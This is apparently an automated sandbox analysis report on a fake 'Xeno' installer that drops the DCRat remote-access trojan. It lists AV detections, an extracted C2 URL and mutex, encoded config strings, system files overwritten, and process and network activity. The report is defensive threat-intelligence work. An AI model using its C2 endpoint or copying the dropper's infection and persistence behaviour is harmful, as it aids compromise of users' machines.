Source: http://804052cm.nyashkoon.ru/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\GyShWgyC.log	Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\Desktop\IlCyhHua.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\BFVQSOun.log	Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\Users\user\Desktop\ESyrPCdJ.log	Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\Users\user\Desktop\ItmQLqVf.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\Aqnqislq.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\ARRIhAyp.log	Avira: detection malicious, Label: HEUR/AGEN.1300079

Found malware configuration

Source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://804052cm.nyashkoon.ru/imagelineGeoTest", "MUTEX": "DCR_MUTEX-SbjZ9dzDfzVchxMwaR3O", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Desktop\Aqnqislq.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\BFVQSOun.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\BOtQCANk.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\ESyrPCdJ.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\GGCzAPYH.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\ItmQLqVf.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\KZGGSUqY.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\LxMgmcSS.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\MPdHuBxA.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\NoWOUMSl.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\NpzpwslB.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\WKMEYgAB.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\ZSKNtyuw.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\dQveIBvX.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\eLGexRyL.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\gQJUAkON.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\kEjDZxDz.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\remTNUPL.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\tBjJkMRH.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\uOpJsBHp.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\vMsrqipz.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\vcvJAqxW.log	ReversingLabs: Detection: 29%

Multi AV Scanner detection for submitted file

Source: XenoSetup(2).exe.bin.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\GyShWgyC.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GGCzAPYH.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\IlCyhHua.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Aqnqislq.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ARRIhAyp.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\FSpHSmDL.log	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: XenoSetup(2).exe.bin.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-SbjZ9dzDfzVchxMwaR3O","0","","","5","2","WyIyIiwiQzpcXFdpbmRvd3NcXFN5c3RlbTMyTG9jYWwvIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://804052cm.nyashkoon.ru/","imagelineGeoTest"]]

Source: XenoSetup(2).exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XenoSetup(2).exe.bin.exe.log

Jump to behavior

Source: XenoSetup(2).exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: XenoSetup(1).exe, 00000006.00000000.2342774589.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 0000000A.00000000.2466239028.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 0000000A.00000002.2471884148.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000010.00000000.2546623626.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000010.00000002.2557207188.0000000001013000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdb source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdbmmmGCTL source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FEA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	6_2_00FEA69B
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_0100B348 FindFirstFileExA,	6_2_0100B348
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FFC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	6_2_00FFC220
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5ECD20 GetFileAttributesExW,GetFullPathNameW,GetFullPathNameW,_invalid_parameter_noinfo_noreturn,GetFileAttributesExW,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,FindFirstFileExW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,Concurrency::cancel_current_task,	7_2_00007FF68D5ECD20

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: unknown

DNS traffic detected: query: 804052cm.nyashkoon.ru replaycode: Name error (3)

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 804052cm.nyashkoon.ru

Source: NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://804052cm.nyashkoon.ru
Source: NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://804052cm.nyashkoon.ru/
Source: NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://804052cm.nyashkoon.ru/imagelineGeoTest.php
Source: powershell.exe, 00000002.00000002.2325222503.000001A1F8E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2286713568.000001A1E07A1000.00000004.00000800.00020000.00000000.sdmp, DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp, NZdXlPbVdUubKXQ.exe, 00000020.00000002.2767145837.000000000356D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?Architecture:
Source: Xeno.exe, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr	String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: Xeno.exe	String found in binary or memory: https://aka.ms/dotnet/app-launch-failedDownload
Source: Xeno.exe	String found in binary or memory: https://aka.ms/dotnet/app-launch-failedWould
Source: powershell.exe, 00000002.00000002.2286713568.000001A1E07A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2286713568.000001A1E09C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Xeno.exe	String found in binary or memory: https://github.com/Riz-ve/Xeno
Source: Xeno.exe, 00000007.00000000.2346254020.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr	String found in binary or memory: https://github.com/Riz-ve/Xeno.
Source: powershell.exe, 00000002.00000002.2317624286.000001A1F080E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Code function: 6_2_00FE6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

6_2_00FE6FAA

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Windows\System32Local	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File created: C:\Windows\System32Local\d4d0c4061cb618	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Code function: 0_2_00007FFD348B0A21	0_2_00007FFD348B0A21
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34898E05	2_2_00007FFD34898E05
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34899EF3	2_2_00007FFD34899EF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34892785	2_2_00007FFD34892785
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FE848E	6_2_00FE848E
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FE40FE	6_2_00FE40FE
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FF00B7	6_2_00FF00B7
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FF4088	6_2_00FF4088
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_010051C9	6_2_010051C9
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FF7153	6_2_00FF7153
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FE32F7	6_2_00FE32F7
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FF62CA	6_2_00FF62CA
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FF43BF	6_2_00FF43BF
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FEF461	6_2_00FEF461
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FEC426	6_2_00FEC426
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_0100D440	6_2_0100D440
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FF77EF	6_2_00FF77EF
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FE286B	6_2_00FE286B
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_010119F4	6_2_010119F4
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FEE9B7	6_2_00FEE9B7
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_0100D8EE	6_2_0100D8EE
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FF6CDC	6_2_00FF6CDC
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_01004F9A	6_2_01004F9A
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FF3E0B	6_2_00FF3E0B
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FEEFE2	6_2_00FEEFE2
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5E44E0	7_2_00007FF68D5E44E0
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5EF010	7_2_00007FF68D5EF010
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5E7290	7_2_00007FF68D5E7290
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5EAA70	7_2_00007FF68D5EAA70
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5EE650	7_2_00007FF68D5EE650
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5E2DB0	7_2_00007FF68D5E2DB0
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5EBD80	7_2_00007FF68D5EBD80
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5ECD20	7_2_00007FF68D5ECD20
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5E30E0	7_2_00007FF68D5E30E0
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5EC810	7_2_00007FF68D5EC810
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34891A7D	15_2_00007FFD34891A7D
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34891755	15_2_00007FFD34891755
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34C66100	15_2_00007FFD34C66100
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34C54628	15_2_00007FFD34C54628
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34C52DF2	15_2_00007FFD34C52DF2
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34C5C5F0	15_2_00007FFD34C5C5F0
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34C5C5D1	15_2_00007FFD34C5C5D1
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34C55BD3	15_2_00007FFD34C55BD3
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34FF505B	15_2_00007FFD34FF505B
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 15_2_00007FFD34FF4F55	15_2_00007FFD34FF4F55
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 31_2_00007FFD348B1A7D	31_2_00007FFD348B1A7D
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 31_2_00007FFD348B1755	31_2_00007FFD348B1755
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 31_2_00007FFD348DFA65	31_2_00007FFD348DFA65
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD348B03FA	32_2_00007FFD348B03FA
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD348CFA65	32_2_00007FFD348CFA65
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD348A1A7D	32_2_00007FFD348A1A7D
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD348A1755	32_2_00007FFD348A1755
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C640F2	32_2_00007FFD34C640F2
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C64628	32_2_00007FFD34C64628
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C62DF2	32_2_00007FFD34C62DF2
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C6C5F0	32_2_00007FFD34C6C5F0
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C7E19E	32_2_00007FFD34C7E19E
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C6C5D1	32_2_00007FFD34C6C5D1
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C6CAF4	32_2_00007FFD34C6CAF4
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C6C2FC	32_2_00007FFD34C6C2FC
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C6C2F8	32_2_00007FFD34C6C2F8
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C6C310	32_2_00007FFD34C6C310
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C6C435	32_2_00007FFD34C6C435
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD34C65BD4	32_2_00007FFD34C65BD4
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD3500505B	32_2_00007FFD3500505B
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 32_2_00007FFD35004F55	32_2_00007FFD35004F55
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 40_2_00007FFD348CFA65	40_2_00007FFD348CFA65
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 40_2_00007FFD348A1A7D	40_2_00007FFD348A1A7D
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 40_2_00007FFD348A1755	40_2_00007FFD348A1755
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 41_2_00007FFD34891A7D	41_2_00007FFD34891A7D
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 41_2_00007FFD34891755	41_2_00007FFD34891755
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 41_2_00007FFD348BFA65	41_2_00007FFD348BFA65
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 45_2_00007FFD348B1A7D	45_2_00007FFD348B1A7D
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 45_2_00007FFD348B1755	45_2_00007FFD348B1755
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 47_2_00007FFD348A1A7D	47_2_00007FFD348A1A7D
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 47_2_00007FFD348A1755	47_2_00007FFD348A1755
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 49_2_00007FFD348A1A7D	49_2_00007FFD348A1A7D
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 49_2_00007FFD348A1755	49_2_00007FFD348A1755
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Code function: 49_2_00007FFD348CFA65	49_2_00007FFD348CFA65
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 52_2_00007FFD348DFA65	52_2_00007FFD348DFA65
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 52_2_00007FFD348B1A7D	52_2_00007FFD348B1A7D
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Code function: 52_2_00007FFD348B1755	52_2_00007FFD348B1755

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\ARRIhAyp.log 32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: String function: 00FFEB78 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: String function: 00FFF5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: String function: 00FFEC50 appears 56 times

Source: tBjJkMRH.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: KZGGSUqY.log.15.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
